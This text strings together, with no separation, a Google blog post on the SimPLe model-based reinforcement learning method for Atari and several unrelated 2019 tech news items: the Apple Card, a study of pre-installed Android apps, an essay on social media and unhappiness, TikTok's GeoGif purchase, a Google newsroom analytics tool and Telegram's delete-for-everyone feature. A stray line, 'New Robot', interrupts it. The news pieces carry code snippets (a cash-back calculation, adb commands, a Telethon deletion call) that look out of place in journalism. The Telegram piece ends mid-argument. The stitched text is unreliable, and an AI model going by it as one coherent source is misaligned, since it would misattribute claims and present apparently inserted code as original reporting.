25 March 2019

Simulated Policy Learning in Video Models




Deep reinforcement learning (RL) techniques can be used to learn policies for complex tasks from visual inputs, and have been applied with great success to classic Atari 2600 games. Recent work in this field has shown that it is possible to get super-human performance in many of them, even in challenging exploration regimes such as that exhibited by Montezuma's Revenge. However, one of the limitations of many state-of-the-art approaches is that they require a very large number of interactions with the game environment, often much larger than what people would need to learn to play well. One plausible hypothesis explaining why people learn these tasks so much more efficiently is that they are able to predict the effect of their own actions, and thus implicitly learn a model of which action sequences will lead to desirable outcomes. This general idea—building a so-called model of the game and using it to learn a good policy for selecting actions—is the main premise of model-based reinforcement learning (MBRL).

In "Model-Based Reinforcement Learning for Atari", we introduce the Simulated Policy Learning (SimPLe) algorithm, an MBRL framework to train agents for Atari gameplay that is significantly more efficient than current state-of-the-art techniques, and shows competitive results using only ~100K interactions with the game environment (equivalent to roughly two hours of real-time play by a person). In addition, we have open sourced our code as part of the tensor2tensor open source library. The release contains a pretrained world model that can be run with a simple command line and that can be played using an Atari-like interface.

Learning a SimPLe World Model
At a high-level, the idea behind SimPLe is to alternate between learning a world model of how the game behaves and using that model to optimize a policy (with model-free reinforcement learning) within the simulated game environment. The basic principles behind this algorithm are well established and have been employed in numerous recent model-based reinforcement learning methods.
Main loop of SimPLe. 1) The agent starts interacting with the real environment. 2) The collected observations are used to update the current world model. 3) The agent updates the policy by learning inside the world model.
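To make that alternation concrete, here is a minimal Python sketch of the outer loop, with placeholder functions standing in for the three phases. The function names, sizes and iteration counts are illustrative assumptions, not the tensor2tensor implementation.

import numpy as np

def collect_real_experience(policy, num_steps):
    # Stand-in for phase 1: act in the real Atari environment and log
    # frames, actions and rewards (zero-filled placeholders here).
    frames = np.zeros((num_steps, 105, 80, 3), dtype=np.uint8)
    actions = np.random.randint(0, 4, size=num_steps)
    rewards = np.zeros(num_steps, dtype=np.float32)
    return frames, actions, rewards

def train_world_model(world_model, experience):
    # Stand-in for phase 2: supervised next-frame and reward prediction.
    return world_model

def train_policy_in_model(policy, world_model):
    # Stand-in for phase 3: PPO updates on rollouts inside the learned simulator.
    return policy

world_model, policy = None, None
for iteration in range(15):
    experience = collect_real_experience(policy, num_steps=6400)
    world_model = train_world_model(world_model, experience)
    policy = train_policy_in_model(policy, world_model)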
To train an Atari game playing model we first need to generate plausible versions of the future in pixel space. In other words, we seek to predict what the next frame will look like, by taking as input a sequence of already observed frames and the commands given to the game, such as "left", "right", etc. One of the important reasons for training a world model in observation space is that it is, in effect, a form of self-supervision, where the observations—pixels, in our case—form a dense and rich supervision signal.

If successful in training such a model (e.g. a video predictor), one essentially has a learned simulator of the game environment that can be used to generate trajectories for training a good policy for a gaming agent, i.e. choosing a sequence of actions such that long-term reward of the agent is maximized. In other words, instead of having the policy be trained on sequences from the real game, which is prohibitively intensive in both time and computation, we train the policy on sequences coming from the world model / learned simulator.

Our world model is a feedforward convolutional network that takes in four frames and predicts the next frame as well as the reward (see figure above). However, in the case of Atari, the future is non-deterministic given only a horizon of the previous four frames. For example, a pause in the game longer than four frames, such as when the ball falls out of the frame in Pong, can lead to a failure of the model to predict subsequent frames successfully. We handle stochasticity problems such as these with a new video model architecture that does much better in this setting, inspired by previous work.
One example of an issue arising from stochasticity is seen when the SimPLe model is applied to Kung Fu Master. In the animation, the left is the output of the model, the middle is the groundtruth, and the right panel is the pixel-wise difference between the two. Here the model's predictions deviate from the real game by spawning a different number of opponents.
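As a rough illustration of the kind of model just described (not the paper's actual architecture, which also handles stochasticity with latent variables), a toy action-conditioned frame predictor might look like the following in Keras. The layer sizes and the 104x80 frame size are assumptions chosen so the shapes divide evenly.

import tensorflow as tf

frames = tf.keras.Input(shape=(104, 80, 12))   # four RGB frames stacked on channels
action = tf.keras.Input(shape=(4,))            # one-hot action

x = tf.keras.layers.Conv2D(64, 4, strides=2, padding="same", activation="relu")(frames)
x = tf.keras.layers.Conv2D(128, 4, strides=2, padding="same", activation="relu")(x)

# Broadcast the action over the feature map so the decoder is conditioned on it.
a = tf.keras.layers.Reshape((1, 1, 128))(tf.keras.layers.Dense(128)(action))
x = x + a

y = tf.keras.layers.Conv2DTranspose(64, 4, strides=2, padding="same", activation="relu")(x)
next_frame = tf.keras.layers.Conv2DTranspose(3, 4, strides=2, padding="same")(y)
reward = tf.keras.layers.Dense(1)(tf.keras.layers.Flatten()(x))

model = tf.keras.Model([frames, action], [next_frame, reward])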
At each iteration, after the world model is trained, we use this learned simulator to generate rollouts (i.e. sample sequences of actions, observations and outcomes) that are used to improve the game playing policy using the Proximal Policy Optimization (PPO) algorithm. One important detail for making SimPLe work is that the sampling of rollouts starts from the real dataset frames. Because prediction errors typically compound over time and make long-term predictions very difficult, SimPLe only uses medium-length rollouts. Luckily, the PPO algorithm can learn long-term effects between actions and rewards from its internal value function too, so rollouts of limited length are sufficient even for games with sparse rewards like Freeway.
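A hedged sketch of that sampling scheme (hypothetical function signatures): each rollout is seeded with four consecutive frames from the real data, then unrolled inside the model for a limited number of steps.

import numpy as np

def sample_rollout(world_model, policy, real_frames, rollout_len=50):
    # Seed the simulator with a 4-frame context taken from real gameplay.
    start = np.random.randint(len(real_frames) - 4)
    state = real_frames[start:start + 4]
    trajectory = []
    for _ in range(rollout_len):        # medium-length only: model errors compound
        action = policy(state)
        next_frame, reward = world_model(state, action)
        trajectory.append((state, action, reward))
        # Slide the window: drop the oldest frame, append the predicted one.
        state = np.concatenate([state[1:], next_frame[None]], axis=0)
    return trajectory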

SimPLe Efficiency
One measure of success is to demonstrate that the model is highly efficient. For this, we evaluated the output of our policies after 100K interactions with the environment, which corresponds to roughly two hours of real-time game play by a person. We compare our SimPLe method with two state-of-the-art model-free RL methods, Rainbow and PPO, applied to 26 different games. In most cases, the SimPLe approach has a sample efficiency more than 2x better than the other methods.
The number of interactions needed by the respective model-free algorithms (left - Rainbow; right - PPO) to match the score achieved using our SimPLe training method. The red line indicates the number of interactions used by our method.
SimPLe Success
An exciting result of the SimPLe approach is that for two of the games, Pong and Freeway, an agent trained in the simulated environment is able to achieve the maximum score. Here is a video of our agent playing the game using the game model that we learned for Pong:
For Freeway, Pong and Breakout, SimPLe can generate nearly pixel-perfect predictions up to 50 steps into the future, as shown below.
Nearly pixel perfect predictions can be made by SimPLe, on Breakout (top) and Freeway (bottom). In each animation, the left is the output of the model, the middle is the groundtruth, and the right pane is the pixel-wise difference between the two.
SimPLe Surprises
SimPLe does not always make correct predictions, however. The most common failure is due to the world model not accurately capturing or predicting small but highly relevant objects. Some examples are: (1) in Atlantis and Battlezone bullets are so small that they tend to disappear, and (2) Private Eye, in which the agent traverses different scenes, teleporting from one to the other. We found that our model generally struggled to capture such large global changes.
In Battlezone, we find the model struggles with predicting small, relevant parts, such as the bullet.
Conclusion
The main promise of model-based reinforcement learning methods is in environments where interactions are either costly, slow or require human labeling, such as many robotics tasks. In such environments, a learned simulator would enable a better understanding of the agent's environment and could lead to new, better and faster ways for doing multi-task reinforcement learning. While SimPLe does not yet match the performance of standard model-free RL methods, it is substantially more efficient, and we expect future work to further improve the performance of model-based techniques.

If you'd like to develop your own models and experiments, head to our repository and colab where you'll find instructions on how to reproduce our work along with pre-trained world models.

Acknowledgements
This work was done in collaboration with the University of Illinois at Urbana-Champaign, the University of Warsaw and deepsense.ai. We would like to give special recognition to paper co-authors Mohammad Babaeizadeh, Piotr Miłos, Błażej Osiński, Roy H Campbell, Konrad Czechowski, Chelsea Finn, Piotr Kozakowski, Sergey Levine, Ryan Sepassi, George Tucker and Henryk Michalewski.

Apple introduces its own credit card, the Apple Card


Today, Apple announced… a credit card. The Apple Card is designed for the iPhone and will work with the Wallet app. You sign up from your iPhone and you can use it with Apple Pay in just a few minutes.

Before introducing the card, Apple CEO Tim Cook shared a few numbers about Apple Pay. This year, Apple Pay will reach 10 billion transactions. By the end of this year, Apple Pay will be available in more than 40 countries.

Retail acceptance of Apple Pay keeps growing. In the U.S., 70 percent of businesses accept Apple Pay. But it’s higher in some countries — Australia is at 99 percent acceptance, for instance.

But let’s talk about the Apple Card. After signing up, you control the Apple Card from the Wallet app. When you tap on the card, you can see your latest transactions, how much you owe and how much money you spent in each category.

You can tap on a transaction and see the location in a tiny Apple Maps view. Every time you make an Apple Pay transaction, you get 2 percent in cash back. You don’t have to wait until the end of the month as your cash is credited every day. For Apple purchases, you get 3 percent back.

As previously rumored, Apple has partnered with Goldman Sachs and Mastercard to issue the card. Apple doesn’t know what you bought, where you bought it and how much you paid for it. And Goldman Sachs promises that it won’t sell your data for advertising or marketing.

When it comes to the fine print, there are no late fees, no annual fees, no international fees and no over-limit fees. If you can’t pay back your credit card balance, you can start a multi-month plan — Apple tries to clearly define the terms of the plan. You can contact customer support through text messages in the Messages app.

The Apple Card isn’t limited to a virtual card. You get a physical titanium card with a laser-etched name. There’s no card number, no CVV code, no expiration date and no signature on the card. You have to use the Wallet app to get that information. Physical transactions are eligible for 1 percent in daily cash.
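Put together, the cash-back arithmetic is straightforward. This toy Python calculation (with invented purchase amounts) just illustrates the daily crediting across the three tiers described above.

# Assumed tiers from the article: 2% Apple Pay, 3% Apple purchases, 1% physical card.
purchases = [("coffee via Apple Pay", 4.50, 0.02),
             ("App Store subscription", 9.99, 0.03),
             ("groceries on the titanium card", 82.10, 0.01)]
daily_cash = sum(amount * rate for _, amount, rate in purchases)
print(f"Daily Cash credited today: ${daily_cash:.2f}")  # credited daily, not month-end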

When it comes to security, you’ll get a different credit card number for each of your devices. It is stored securely and you can access the PIN code using Face ID or your fingerprint.

The card will be available this summer for customers in the U.S.



Android users’ security and privacy at risk from shadowy ecosystem of pre-installed software, study warns


A large-scale independent study of pre-installed Android apps has cast a critical spotlight on the privacy and security risks that preloaded software poses to users of the Google developed mobile platform.

The researchers behind the paper, which has been published in preliminary form ahead of a future presentation at the IEEE Symposium on Security and Privacy, unearthed a complex ecosystem of players with a primary focus on advertising and “data-driven services” — which they argue the average Android user is likely to be unaware of (while also likely lacking the ability to uninstall or evade the baked-in software’s privileged access to data and resources themselves).

The study, which was carried out by researchers at the Universidad Carlos III de Madrid (UC3M) and the IMDEA Networks Institute, in collaboration with the International Computer Science Institute (ICSI) at Berkeley and Stony Brook University in New York, encompassed more than 82,000 pre-installed Android apps across more than 1,700 devices manufactured by 214 brands, according to the IMDEA institute.

“The study shows, on the one hand, that the permission model on the Android operating system and its apps allow a large number of actors to track and obtain personal user information,” it writes. “At the same time, it reveals that the end user is not aware of these actors in the Android terminals or of the implications that this practice could have on their privacy.  Furthermore, the presence of this privileged software in the system makes it difficult to eliminate it if one is not an expert user.”

An example of a well-known app that can come pre-installed on certain Android devices is Facebook.

Earlier this year the social network giant was revealed to have inked an unknown number of agreements with device makers to preload its app. And while the company has claimed these pre-installs are just placeholders — unless or until a user chooses to actively engage with and download the Facebook app, Android users essentially have to take those claims on trust with no ability to verify the company’s claims (short of finding a friendly security researcher to conduct a traffic analysis) nor remove the app from their device themselves. Facebook pre-loads can only be disabled, not deleted entirely.

The company’s preloads also sometimes include a handful of other Facebook-branded system apps which are even less visible on the device and whose function is even more opaque.

Facebook previously confirmed to TechCrunch there’s no ability for Android users to delete any of its preloaded Facebook system apps either.

“Facebook uses Android system apps to ensure people have the best possible user experience including reliably receiving notifications and having the latest version of our apps. These system apps only support the Facebook family of apps and products, are designed to be off by default until a person starts using a Facebook app, and can always be disabled,” a Facebook spokesperson told us earlier this month.

But the social network is just one of scores of companies involved in a sprawling, opaque and seemingly interlinked data gathering and trading ecosystem that Android supports and which the researchers set out to shine a light into.

In all, 1,200 developers were identified behind the pre-installed software found in the data-set they examined, as well as more than 11,000 third-party libraries (SDKs). Many of the preloaded apps were found to display what the researchers dub potentially dangerous or undesired behavior.

The data-set underpinning their analysis was collected via crowd-sourcing methods — using a purpose-built app (called Firmware Scanner), and pulling data from the Lumen Privacy Monitor app. The latter provided the researchers with visibility on mobile traffic flow — via anonymized network flow metadata obtained from its users. 

They also crawled the Google Play Store to compare their findings on pre-installed apps with publicly available apps — and found that just 9% of the package names in their dataset were publicly indexed on Play. 
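For a sense of the raw material involved, here is a hedged Python sketch (not the researchers' pipeline) that lists the packages shipped on a connected device's system image using adb; package names gathered this way are what you would then look up on Play.

import subprocess

# Requires adb on PATH and a connected device with USB debugging enabled.
out = subprocess.run(["adb", "shell", "pm", "list", "packages", "-s", "-f"],
                     capture_output=True, text=True, check=True).stdout
preinstalled = [line.removeprefix("package:") for line in out.splitlines() if line]
print(len(preinstalled), "packages on the system image")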

Another concerning finding relates to permissions. In addition to standard permissions defined in Android (i.e. which can be controlled by the user), the researchers say they identified more than 4,845 owner or “personalized” permissions defined by different actors in the manufacture and distribution of devices.
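Custom permissions can be enumerated in a similar way. This is a rough illustration (the namespace filter is an assumption, not the study's methodology) that flags declared permissions outside the standard android.permission namespace.

import subprocess

out = subprocess.run(["adb", "shell", "pm", "list", "permissions"],
                     capture_output=True, text=True, check=True).stdout
custom = [line.split(":", 1)[1] for line in out.splitlines()
          if line.startswith("permission:")
          and not line.split(":", 1)[1].startswith("android.permission.")]
# Crude filter: some legitimate AOSP permissions live outside this namespace too.
print(len(custom), "non-standard permissions, e.g.", custom[:5])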

So that means they found systematic user permission workarounds being enabled by scores of commercial deals cut in a non-transparent, data-driven background Android software ecosystem.

“This type of permission allows the apps advertised on Google Play to evade Android’s permission model to access user data without requiring their consent upon installation of a new app,” writes the IMDEA.

The top-line conclusion of the study is that the supply chain around Android’s open source model is characterized by a lack of transparency — which in turn has enabled an ecosystem to grow unchecked and get established that’s rife with potentially harmful behaviors and even backdoored access to sensitive data, all without most Android users’ consent or awareness. (On the latter front the researchers carried out a small-scale survey of consent forms of some Android phones to examine user awareness.)

tl;dr the phrase ‘if it’s free you’re the product’ is a too trite cherry atop a staggeringly large yet entirely submerged data-gobbling iceberg. (Not least because Android smartphones don’t tend to be entirely free.)

“Potential partnerships and deals — made behind closed doors between stakeholders — may have made user data a commodity before users purchase their devices or decide to install software of their own,” the researchers warn. “Unfortunately, due to a lack of central authority or trust system to allow verification and attribution of the self-signed certificates that are used to sign apps, and due to a lack of any mechanism to identify the purpose and legitimacy of many of these apps and custom permissions, it is difficult to attribute unwanted and harmful app behaviors to the party or parties responsible. This has broader negative implications for accountability and liability in this ecosystem as a whole.”

The researchers go on to make a series of recommendations intended to address the lack of transparency and accountability in the Android ecosystem — including suggesting the introduction and use of certificates signed by globally-trusted certificate authorities, or a certificate transparency repository “dedicated to providing details and attribution for certificates used to sign various Android apps, including pre-installed apps, even if self-signed”.

They also suggest Android devices should be required to document all pre-installed apps, plus their purpose, and name the entity responsible for each piece of software — and do so in a manner that is “accessible and understandable to users”.

“[Android] users are not clearly informed about third-party software that is installed on their devices, including third-party tracking and advertising services embedded in many pre-installed apps, the types of data they collect from them, the capabilities and the amount of control they have on their devices, and the partnerships that allow information to be shared and control to be given to various other companies through custom permissions, backdoors, and side-channels. This necessitates a new form of privacy policy suitable for preinstalled apps to be defined and enforced to ensure that private information is at least communicated to the user in a clear and accessible way, accompanied by mechanisms to enable users to make informed decisions about how or whether to use such devices without having to root their devices,” they argue, calling for overhaul of what’s long been a moribund T&Cs system, from a consumer rights point of view.

In conclusion they couch the study as merely scratching the surface of “a much larger problem”, saying their hope for the work is to bring more attention to the pre-installed Android software ecosystem and encourage more critical examination of its impact on users’ privacy and security.

They also write that they intend to continue to work on improving the tools used to gather the data-set, as well as saying their plan is to “gradually” make the data-set itself available to the research community and regulators to encourage others to dive in.  




Where did social media go wrong?


For most of my life, the internet, particularly its social media — BBSes, Usenet, LiveJournal, blogosphere, even Myspace, early Twitter and Facebook — consistently made people happier. But roughly five years ago it began to consistently make people more miserable. What changed?

I posted that question to Twitter a week ago, and the most notable response was the response that did not exist: not a single person disputed the premise of the question. Yes, Twitter responses are obviously selection bias incarnate — but looking at the opprobrium aimed at social media from all sides today, I’d think that if anything it understates the current collective wisdom. Which of course can often be disjointed from factual reality … but still important. So, again: what changed?

Some argued that new, bad users flooded the internet then, a kind of ultimate Eternal September effect. I’m skeptical. Even five years ago Facebook was already ubiquitous in the West, and we were already constantly checking it on our smartphones. Others argue that it reflects happiness decreasing in society as a whole — but as far back as 2014? I remember that as, generally, a time of optimism, compared to today.

There was one really interesting response, from a stranger: “The nature of these social networks changed. They went from places where people debated to places where lonely people are trying to feel less lonely.” Relatedly, from a friend: “The algorithms were designed to make people spend more time on those sites. Interestingly, unhappy people spend more time on social sites. Is unhappiness the cause, or the result of algorithms surfacing content to make us unhappy?” That’s worth pondering.

Pretty much everyone else talked about money, basically buttressing the argument above. Modern social media algorithms drive engagement, because engagement drives advertising, and advertising drives profits, which are then used to hone the algorithms. It’s a perpetual motion engagement machine. Olden days social media, early Facebook and early Twitter, they had advertising, sure — but they didn’t have anything like today’s perpetual motion engagement.

Even that wouldn’t be so bad if it weren’t for the fact that there’s apparently a whole other perpetual motion machine at work in parallel, too: engagement drives unhappiness which drives engagement which drives unhappiness, because the kind of content which drives the most engagement apparently also drives anxiety and outrage — cf. Evan Williams’ notion that social media optimizes for car crashes — and arguably also, in the longer run, displaces other activities, which do bring happiness and fulfillment.

I don’t want to sound like some sort of blood-and-thunder Luddite preacher. There’s nothing automatically wrong with maintaining a thriving existence on Facebook and Twitter, especially if you carefully prune your feeds such that they are asshole-free zones with minimal dogpiling and pointless outrage. (Some outrage is important. But most isn’t.) Social media has done a lot of excellent things, and still brings a lot of happiness to very many people.

But also, and increasingly, a lot of misery. Does it currently bring us net happiness? Five years ago I think that question would have seemed ridiculous to most: the answer would generally have been a quick yes-of-course. Nowadays, most would stop and wonder, and many would answer with an even faster hell-no. Five years ago, people who worked at Facebook (and to a lesser extent Twitter) were treated with respect and admiration by the rest of the tech industry. Nowadays, fairly or not, it’s something a lot more like disdain, and sometimes outright contempt.

The solution is obvious: change the algorithms. Which is to say: make less money. Ha. They could even remove the algorithms entirely, switch back to Strict Chronological, and still make money — Twitter was profitable (before stock options) before it switched to an algorithmic feed, and its ad offerings were way less sophisticated back then — but it’s not about making money, it’s about making the most money possible, and that means algorithmically curated, engagement-driven, misery-inducing feeds.

So: Social media is increasingly making us miserable. There’s an obvious solution, but financial realpolitik means we can’t get to it from here. So either we just accept this spreading misery as a normal, inescapable, fundamental part of our lives now — or some broader, more drastic solution is required. It’s a quandary.



New Robot



TikTok quietly picked up the assets of GeoGif, which created animated, location-specific overlays for video


Video sharing app TikTok passed 1 billion downloads last month, and its parent company ByteDance is ramping up its efforts to monetize those users with ads, while also continuing to add more features to the app to keep people engaged. In a move that could help both of those efforts, ByteDance has made a small acquisition, picking up the assets of a defunct startup called GeoGif, which developed location-specific, animated stickers and overlays for videos, suggested to users when they capture video or images in specific places.

It seems that the location-based, animated element of what GeoGif built is the key part of what might be coming soon to TikTok, since the app already has a range of visual and audio filters and stickers to alter appearances and your voice, or just to embellish and further personalize your video.

Here’s the general gist of what GeoGif can do for a video if you are, for example, in Miami for Spring Break. (Note: This is not the greatest example given the naff and objectifying subject matter, but it’s the only example the startup has provided.)

The terms of the acquisition have not been disclosed, although we have asked both Dean Glas, one of GeoGif’s co-founders, and ByteDance, and we will update if we learn more. In any case, the deal appears to include only the assets of the startup, which ceased operating more than two years ago, judging by activity on its social media accounts and LinkedIn profiles. Glas and his co-founder Mendy Raskin are now both working on new startups.

“We are excited for GeoGif to have a new home at TikTok,” said GeoGif’s CEO Dean Glas, “and we believe our features will be enjoyed by millions of users. We will work closely to make sure it’s a smooth transition that provides a long-term positive impact for the TikTok community.”

A TikTok spokesperson also confirmed that the features that were built for GeoGif will get rolled into the main TikTok app: “GeoGif and TikTok share a common goal which is enabling people to connect, consume, and create great content. We’re impressed with what the team at GeoGif has built and with TikTok’s resources, we believe that we will deliver an even better user experience for our millions of users who love using TikTok to express their creativity through short videos.”

With TikTok, China’s ByteDance has created one of the world’s biggest video apps — and subsequently become one of the world’s most valuable startups — and it has used acquisition as a key lever for adding both users and features.

To help break into the US, the main app itself merged with Musical.ly last year after being acquired for between $800 million and $1 billion by Toutiao (a ByteDance sub-brand) in 2017. Other acquisitions have included Flipagram — another music-video app and startup — in 2017 for an undisclosed sum; the AR selfie camera FaceU in 2018, reportedly for $300 million; payments startup UIPay also in 2018; and — just last week — it appears ByteDance acquired a gaming startup, Mokun Technology, from previous owner 37 Interactive, also for an undisclosed sum.

It’s likely that the GeoGif acquisition was for a small sum: the company did not have anything close to mass-market traction, and it had raised only a seed round of an undisclosed amount. It was originally spun out of parent company Bivid — which is also now defunct but had been a hyperlocal social network akin to Yik Yak, Highlight and Zenly, suggesting friends and others who were near you for chit-chat, or simply to know their whereabouts.

TikTok already runs ads and has other paid features in China, but in Western markets like the US, the company has largely only been doing limited runs and tests of different formats, such as this native video ad test we spotted in February.

In January, a leaked ad deck from the company in Europe also mentioned several advertising and marketing units it was running and planning to run including brand takeovers; in-feed native video; hashtag challenges; Snapchat-style 2D lens filters for photos; and 3D and AR lenses. It’s the latter of these where GeoGif’s efforts could be rolled in.

Also in January, Bloomberg reported that in 2018, ByteDance, for the first time, had failed to beat its own revenue forecasts: It had told investors when it was fundraising a monster $3 billion round that it expected to make between $7.4 billion and $8.1 billion in revenues for the year, and sources said it would be coming in at the lower end of that range.

These are, relatively speaking, huge numbers when you consider that ByteDance’s currency is social media apps, which often spend years making no money at all. But in the context of missing growth expectations, this slower expansion could be a lever for the company launching more ad formats in more places and launching more products, such as the Slack competitor it is also reportedly building.



Google launches a new real-time data product for journalists


It’s been just over a year since Google announced its $300 million News Initiative, which included funding for independent journalism efforts along with products developed by Google.

One of those products was News Consumer Insights, which has been used by publishers like BuzzFeed, Business Insider and Conde Nast. It takes data already collected through Google Analytics and makes it more useful for publishers, particularly when it comes to understanding different audience segments and whether they’re likely to become paying subscribers.

“It’s turning raw data into business intelligence and actionable insights,” said Amy Adams Harding, Google’s head of analytics and revenue optimization and head of publisher development.

Now Google is building on the NCI product with a new tool called Real-time Content Insights.

As the name implies, RCI is focused on telling publishers what’s happening on their site at this moment, and on helping them identify trending news stories that could attract more readers. While the initial NCI data is more useful for a publisher’s business or audience development teams, Harding said RCI is designed “to help the editorial side of our partners understand the dynamics of content on their site — what’s trending, what’s falling off, what’s getting traction.”


Real-time Content Insights

Google is hardly the first company to offer real-time data to news publishers, but Harding said this “off-the-shelf, click-to-play” product could be particularly useful for smaller newsrooms that don’t have a lot of resources and aren’t particularly data-savvy.

“Local is a huge pillar of the Google News Initiative,” Harding said. “What can we do to help develop tools where we can be support mechanisms for our partners as they try to stay sustainable during this transition … not only to digital, but one more transition over to this diversified revenue stream? That’s something that many of our publishers are not resourced well enough to take on on their own.”

RCI presents the data in the form of an image-heavy dashboard showing how many readers are looking at a story currently, and how many views the story’s gotten in the past 30 minutes. You can also see how well the site is doing today, compared to a normal day’s traffic, and break down your traffic by geography and referral sources.

The dashboard also shows the topics that are currently trending on Google and Twitter. Of course, not all of those topics will be right for your publication, but Harding said it can help editors and writers identify the gaps in their coverage, based on, “What are people curious about?” (on Google) and “What are people talking about?” (on Twitter).

At first glance, RCI doesn’t seem to tie directly into the bigger goals of helping publishers build sustainable, diversified business models. However, Harding said that it can be used in conjunction with the existing NCI product, which helps them identify their most valuable audiences.

“Where the publisher would see value is, ‘Okay, we know that users coming from direct referral traffic are more valuable, [and] this article is driving viewership from those types of readers,'” she said.

Harding added that Google is making the RCI source code available on GitHub, so that more sophisticated publishers can customize it to create their own data visualizations.



Telegram adds ‘delete everywhere’ nuclear option — killing chat history


Telegram has added a feature that lets a user delete messages in one-to-one and/or group private chats, after the fact, and not only from their own inbox.

The new ‘nuclear option’ delete feature allows a user to selectively delete their own messages and/or messages sent by any/all others in the chat. They don’t even have to have composed the original message or begun the thread to do so. They can just decide it’s time.

Let that sink in.

All it now takes is a few taps to wipe all trace of a historical communication — from both your own inbox and the inbox(es) of whoever else you were chatting with (assuming they’re running the latest version of Telegram’s app).

Just over a year ago Facebook’s founder Mark Zuckerberg was criticized for silently and selectively testing a similar feature by deleting messages he’d sent from his interlocutors’ inboxes — leaving absurdly one-sided conversations. The episode was dubbed yet another Facebook breach of user trust.

Facebook later rolled out a much diluted Unsend feature — giving all users the ability to recall a message they’d sent but only within the first 10 minutes.

Telegram has gone much, much further. This is a perpetual, universal unsend of anything in a private chat.

The “delete any message in both ends in any private chat, anytime” feature has been added in an update to version 5.5 of Telegram — which the messaging app bills as offering “more privacy”, among a slate of other updates including search enhancements and more granular controls.

To delete a message from both ends, a user taps on the message, selects ‘delete’ and is then offered a choice of ‘delete for [the name of the other person in the chat]’ (or for ‘everyone’), or ‘delete for me’. Selecting the former deletes the message everywhere, while the latter just removes it from your own inbox.
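The same operation is also exposed programmatically. As a minimal sketch using the third-party Telethon library (placeholder credentials; this is not Telegram's official client code), the revoke flag is what distinguishes 'delete for everyone' from 'delete for me':

from telethon import TelegramClient

api_id, api_hash = 12345, "0123456789abcdef"   # placeholder API credentials

async def delete_everywhere(chat, message_ids):
    async with TelegramClient("session", api_id, api_hash) as client:
        # revoke=True removes the messages from every participant's inbox;
        # revoke=False would only remove them locally ('delete for me').
        await client.delete_messages(chat, message_ids, revoke=True)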

Explaining the rationale for adding such a nuclear option via a post to his public Telegram channel yesterday, founder Pavel Durov argues the feature is necessary because of the risk of old messages being taken out of context — suggesting the problem is getting worse as the volume of private data stored by chat partners continues to grow exponentially.

“Over the last 10-20 years, each of us exchanged millions of messages with thousands of people. Most of those communication logs are stored somewhere in other people’s inboxes, outside of our reach. Relationships start and end, but messaging histories with ex-friends and ex-colleagues remain available forever,” he writes.

“An old message you already forgot about can be taken out of context and used against you decades later. A hasty text you sent to a girlfriend in school can come back to haunt you in 2030 when you decide to run for mayor.”

Durov goes on to claim that the new wholesale delete gives users “complete control” over messages, regardless of who sent them.

However that’s not really what it does. More accurately, it removes control from everyone in any private chat, and opens the door to the most paranoid, the lowest common denominator, and/or a sort of general entropy/anarchy — allowing anyone in any private thread to choose to edit or even completely nuke the chat history if they so wish, at any moment in time.

The feature could allow for self-servingly and selectively silent and/or malicious edits that are intended to gaslight/screw with others, such as by making them look mad or bad. (A quick screengrab later and a ‘post-truth’ version of a chat thread is ready for sharing elsewhere, where it could be passed off as a genuine conversation even though it’s manipulated and therefore fake.)

Or else the motivation for editing chat history could be a genuine concern over privacy, such as to be able to remove sensitive or intimate stuff — say after a relationship breaks down.

Or just for kicks/the lolz between friends.

Either way, whoever deletes first seizes control of the chat history — taking control away from everyone else in the process. RIP consent. This is possible because Telegram’s implementation of the super delete feature covers all messages, not just your own, and literally removes all trace of the deleted comms.

So unlike rival messaging app WhatsApp, which also lets users delete a message for everyone in a chat after the fact of sending it (though in that case the delete everywhere feature is strictly limited to messages a person sent themselves), there is no notification automatically baked into the chat history to record that a message was deleted.

There’s no record, period. The ‘record’ is purged. There’s no sign at all there was ever a message in the first place.

We tested this — and, well, wow.

It’s hard to think of a good reason not to create at very least a record that a message was deleted which would offer a check on misuse.

But Telegram has not offered anything. Anyone can secretly and silently purge the private record.

Again, wow.

There’s also no way for a user to recall a deleted message after deleting it (even the person who hit the delete button). At face value it appears to be gone for good. (A security audit would be required to determine whether a copy lingers anywhere on Telegram’s servers for standard chats; only its ‘secret chats’ feature uses end-to-end encryption which it claims “leave no trace on our servers”.)

In our tests on iOS we also found that no notification is sent when a message is deleted from a Telegram private chat, so other people in an old convo might simply never notice changes have been made, or not until long after. After all, human memory is far from perfect, and old chat threads are exactly the sort of fast-flowing communication medium where it’s really easy to forget the exact details of what was said.

Durov makes that point himself in defence of enabling the feature, arguing in favor of it so that silly stuff you once said can’t be dredged back up to haunt you.

But it cuts both ways. (The other way being the ability for the sender of an abusive message to delete it and pretend it never existed, for example, or for a flasher to send and subsequently delete dick pics.)

The feature is so powerful there’s clearly massive potential for abuse. Whether that’s by criminals using Telegram to sell drugs or traffic other stuff illegally, and hitting the delete everywhere button to cover their tracks and purge any record of their nefarious activity; or by coercive/abusive individuals seeking to screw with a former friend or partner.

The best way to think of Telegram now is that all private communications in the app are essentially ephemeral.

Anyone you’ve ever chatted to could decide to delete everything you said (or they said) and go ahead without your knowledge let alone your consent.

The lack of any notification that a message has been deleted will certainly open Telegram to accusations it’s being irresponsible by offering such a nuclear delete option with zero guard rails. (And, indeed, there’s no shortage of angry comments on its tweet announcing the feature.)

Though the company is no stranger to controversy and has structured its business intentionally to minimize the risk of it being subject to any kind of regulatory and/or state control, with servers spread opaquely all over the world, and a nomadic development operation which sees its coders regularly switch the country they’re working out of for months at a time.

Durov himself acknowledges there is a risk of misuse of the feature in his channel post, where he writes: “We know some people may get concerned about the potential misuse of this feature or about the permanence of their chat histories. We thought carefully through those issues, but we think the benefit of having control over your own digital footprint should be paramount.”

Again, though, that’s a one-sided interpretation of what’s actually being enabled here. Because the feature inherently removes control from anyone it’s applied to. So it only offers ‘control’ to the person who first thinks to exercise it. Which is in itself a form of massive power asymmetry.

For historical chats the person who deletes first might be someone with something bad to hide. Or it might be the most paranoid person with the best threat awareness and personal privacy hygiene.

But suggesting the feature universally hands control to everyone simply isn’t true.

It’s an argument in line with a libertarian way of thinking that lauds the individual as having agency — and therefore seeks to empower the person who exercises it. (And Durov is a long time advocate for libertarianism so the design choice meshes with his personal philosophy.)

On a practical level, the presence of such a nuclear delete on Telegram’s platform arguably means the only sensible option for all users who don’t want to abandon the platform is to proactively delete all private chats on a regular, rolling basis — to minimize the risk of potential future misuse and/or manipulation of their chat history. (Albeit, what doing that will do to your friendships is a whole other question.)

Users may also wish to backup their own chats because they can no longer rely on Telegram to do that for them.

While, at the other end of the spectrum — for those really wanting to be really sure they totally nuke all message trace — there are a couple of practical pitfalls that could throw a spanner in the works.  

